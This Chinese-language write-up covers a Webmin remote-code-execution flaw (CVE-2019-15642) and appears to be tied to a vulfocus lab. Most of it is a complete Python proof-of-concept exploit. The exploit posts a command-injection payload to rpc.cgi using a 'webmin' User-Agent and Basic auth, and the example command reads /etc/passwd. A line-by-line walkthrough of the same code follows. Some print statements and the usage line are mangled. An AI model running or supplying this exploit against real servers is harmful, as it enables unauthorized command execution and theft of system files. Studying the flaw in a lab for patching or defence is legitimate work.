webmin 远程代码执行 (CVE-2019-15642)
描述: vulfocus/webmin-cve_2019_15642
影响版本: [Webmin <= 1.920]
漏洞原理:
在rawarg函数下存在反序列化漏洞
为了触发我们需要两个先决条件的漏洞:
- 用户代理设置为“webmin”(Webmin将其解释为使用基本auth而不是会话cookie的日志);
- 有效基本权益对于Webmin的用户(例如,使用新创建的具有默认权限的用户“toto”)。
一旦满足了这两个条件,我们就可以走得更远,四处看看。非序列化变量在……里面Web-lib-funcs.pl :
漏洞利用:
这里找到poc
代码如下:
import requests
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import sys
import base64
import re
banner = '''
_______ ________ ___ ___ __ ___ __ _____ __ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ | ____| / /| || |__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | |__ / /_| || |_ ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| |___ \| '_ \__ _/ /
| |____ \ / | |____ / /_| |_| || | / / | |___) | (_) | | |/ /_
\_____| \/ |______| |____|\___/ |_| /_/ |_|____/ \___/ |_|____|
python by jas502n
Webmin RCE (Need Authorization)
usage: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"
'''
def CVE_2019_15642(url, auth_base64, cmd):
vuln_url = url + '/rpc.cgi'
headers = {
"User-Agent": "webmin",
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded",
"Authorization": "Basic %s" % auth_base64,
"Content-Length": "70"
}
proxies = {
'http': 'socks5h://127.0.0.1:1080',
'https': "socks5h://127.0.0.1:1080"
}
payload = r'OBJECT CGI;print "Content-Type: Test\n\n";' + '$cmd=`%s`;print "$cmd";' % cmd
print
"payload= %s" % payload
r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
if r.status_code == 200 and 'Content-type' in r.text:
print
"\nVuln_Url= %s\n" % vuln_url
m = re.findall(r"(.+?)\nContent-type: text/plain", r.text, re.S)
print
">>>Execute Response: \n%s" % m[0]
else:
print
"No Vuln Exit!"
if __name__ == '__main__':
print
banner
username = input("Please Input Webmin Username: ")
password = input("Please Input Webmin Password: ")
auth = username + ':' + password
auth_base64 = base64.b64encode(auth)
print
'\n>>>Authorization: Basic %s\n' % auth_base64
url = sys.argv[1]
cmd = sys.argv[2]
CVE_2019_15642(url, auth_base64, cmd)
使用指令如下:
python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd"`;print ”cmd“
手工如下:需要修改user-Agent和使用root-root账号
分析一下poc代码
CVE_2019_15642(url, auth_base64, cmd):
vuln_url = url + '/rpc.cgi'
headers = {
"User-Agent": "webmin",
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded",
"Authorization": "Basic %s" % auth_base64,
"Content-Length": "70"
}
文件头指定"User-Agent": "webmin",
payload = r'OBJECT CGI;print "Content-Type: Test\n\n";' + '$cmd=`%s`;print "$cmd";' % cmd
payload
r = requests.post(url=vuln_url, data=payload, headers=headers, verify=False)
if r.status_code == 200 and 'Content-type' in r.text:
print
"\nVuln_Url= %s\n" % vuln_url
m = re.findall(r"(.+?)\nContent-type: text/plain", r.text, re.S)
print
">>>Execute Response: \n%s" % m[0]
else:
print
"No Vuln Exit!"
爬虫回显
username = input("Please Input Webmin Username: ")
password = input("Please Input Webmin Password: ")
auth = username + ':' + password
auth_base64 = base64.b64encode(auth)
print
'\n>>>Authorization: Basic %s\n' % auth_base64
url = sys.argv[1]
cmd = sys.argv[2]
CVE_2019_15642(url, auth_base64, cmd)
遵循登录需要的编码协议
漏洞修复:
更新版本